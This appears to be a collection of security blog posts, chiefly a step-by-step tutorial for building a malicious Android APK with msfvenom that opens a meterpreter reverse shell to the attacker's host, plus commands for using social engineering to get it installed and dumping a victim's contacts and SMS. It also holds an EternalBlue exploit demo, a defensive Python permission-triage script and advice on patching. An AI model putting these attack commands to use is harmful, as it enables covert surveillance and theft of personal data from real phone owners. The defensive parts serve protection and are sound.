How To Create a Malicious App for Android

So, I recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious app!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start

msfconsole

First we need to create the malicious .apk file, so open another terminal window and run the following, making sure you enter your own IP address and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first window running Metasploit we now start a handler which will “listen” for the connection attempt that is launched when our app is installed and run. We do this like so.

use exploit/multi/handler

Then we need to set the IP, port and payload. The IP and port must match the values used with msfvenom in the previous step.

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what options are required for a module at any time once it is loaded by running

show options

We now have everything configured, so we can start the “listener”.

run

Then we use social engineering to try and get someone to install and run it.

When they do, you will see the connection come back from the phone.

In this example we got 2 connections! We can list them with this command.

sessions -l

We can then interact with a session by using the same command with the number of the session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.

sysinfo

Then we can dump information from the phone immediately using the dump commands.

dump_contacts

dump_sms

You can also capture a screenshot, take a photo from either camera, or even stream live video from either camera on the device. Scary huh?

If you have no anti-virus on your Android, and you have disabled the “Verify apps” feature, then this simple app will run without any issues.

If you have an Android phone, enable the app verifier, and get some anti-virus to at least give yourself a fighting chance!
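One practical check a defender can make before installing an app is to look at what it asks for: the payload above can only dump contacts and SMS, use the cameras and phone home if the app holds the matching permissions. The script below is an added example, not code from the original post; it parses the text output of `aapt dump permissions app.apk` (aapt ships with the Android SDK build-tools) and flags the combination of sensitive permissions plus network access. The sample aapt output, the package name and the risk thresholds are constructed for illustration.

```python
"""Triage the permissions an Android APK requests before installing it.

Added example (not from the original post). Parses the text output of
`aapt dump permissions app.apk` and flags the permission combination a
data-theft payload needs: contacts, SMS, camera, microphone plus INTERNET.
"""
import re
import subprocess
from typing import Iterable

# Real Android permission names, mapped to the capability each unlocks.
SENSITIVE = {
    "android.permission.READ_CONTACTS": "read contacts",
    "android.permission.READ_SMS": "read SMS",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
    "android.permission.SEND_SMS": "send SMS",
    "android.permission.CAMERA": "use the cameras",
    "android.permission.RECORD_AUDIO": "record the microphone",
    "android.permission.ACCESS_FINE_LOCATION": "track location",
    "android.permission.READ_CALL_LOG": "read the call log",
    "android.permission.READ_PHONE_STATE": "read phone identity",
}
NETWORK = "android.permission.INTERNET"

# Accepts both aapt output styles seen in the wild:
#   uses-permission: name='android.permission.X'   (newer build-tools)
#   uses-permission: android.permission.X          (older build-tools)
_PERM_RE = re.compile(r"^uses-permission(?:-sdk-23)?:\s*(?:name=')?([\w.]+)'?")


def parse_permissions(aapt_output: str) -> list:
    """Return the permission names listed in `aapt dump permissions` output."""
    perms = []
    for line in aapt_output.splitlines():
        m = _PERM_RE.match(line.strip())
        if m:
            perms.append(m.group(1))
    return perms


def assess(perms: Iterable[str]) -> dict:
    """Score a permission set: 'high' when several sensitive permissions
    are combined with network access (data can leave the phone),
    'medium' for any sensitive permission, 'low' otherwise.
    Thresholds are an assumption chosen for this example."""
    perms = set(perms)
    hits = {p: SENSITIVE[p] for p in perms if p in SENSITIVE}
    has_network = NETWORK in perms
    if has_network and len(hits) >= 3:
        verdict = "high"
    elif hits:
        verdict = "medium"
    else:
        verdict = "low"
    return {"verdict": verdict, "sensitive": hits, "network": has_network}


def assess_apk(path: str) -> dict:
    """Run aapt on a real APK. Assumes `aapt` is on PATH (Android SDK build-tools)."""
    out = subprocess.run(
        ["aapt", "dump", "permissions", path],
        capture_output=True, text=True, check=True,
    ).stdout
    return assess(parse_permissions(out))


# Constructed sample of aapt output for an app that asks for far more
# than a notes app should need.
SAMPLE_OUTPUT = """package: com.example.notes
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'
"""

if __name__ == "__main__":
    report = assess(parse_permissions(SAMPLE_OUTPUT))
    print(f"verdict: {report['verdict']} (network access: {report['network']})")
    for perm, why in sorted(report["sensitive"].items()):
        print(f"  {perm}: {why}")
```

Run it against a real file with `assess_apk("suspect.apk")`; the "high" verdict on the constructed sample comes from the same four capabilities the post demonstrates (contacts, SMS, camera, microphone) combined with network access, which is exactly what is needed to get that data off the phone.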

There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.

Eternal Blue Scan and Exploit Demo

It’s everywhere at the moment. MS17-010 (ms17_010 in Metasploit), or Eternal Blue as it’s affectionately known. It’s another great example of why it’s so important to not only keep your anti-virus solution up to date, but also to install the latest patches for your OS. This exploit requires just 2 things: that the port is open and that the required patch is not installed. In this demonstration we are attacking Windows Server 2008, set up using the Metasploitable 3 script from this project https://github.com/rapid7/metasploitable3

You can see that both the scanner and the exploit are built right into Metasploit and they are very easy to use. Patch your machines. Even if you think you can’t, set up a test environment and try. Make good backups, and check that they work. Enjoy the video.

If you want to set up Metasploitable 3 you need to do a bit of legwork; it doesn’t just work out of the box like its predecessor, and you need to install some prerequisites. The guides I used are here http://www.prodefence.org/2017/06/setup-metasploitable-3-windows-10/ and here https://www.youtube.com/watch?v=i_K2cZcTXeI&t=580s


Check for and uninstall old software

You keep your PC up to date with the latest patches and run a good anti-virus solution, so you must be safe, right? Have you got old software installed that you don’t use anymore or have forgotten about? Old, discontinued or out-of-date software can leave a wide open hole into your network. This video shows a port scan and quick exploit of some old software on a PC, software which should have been uninstalled years ago.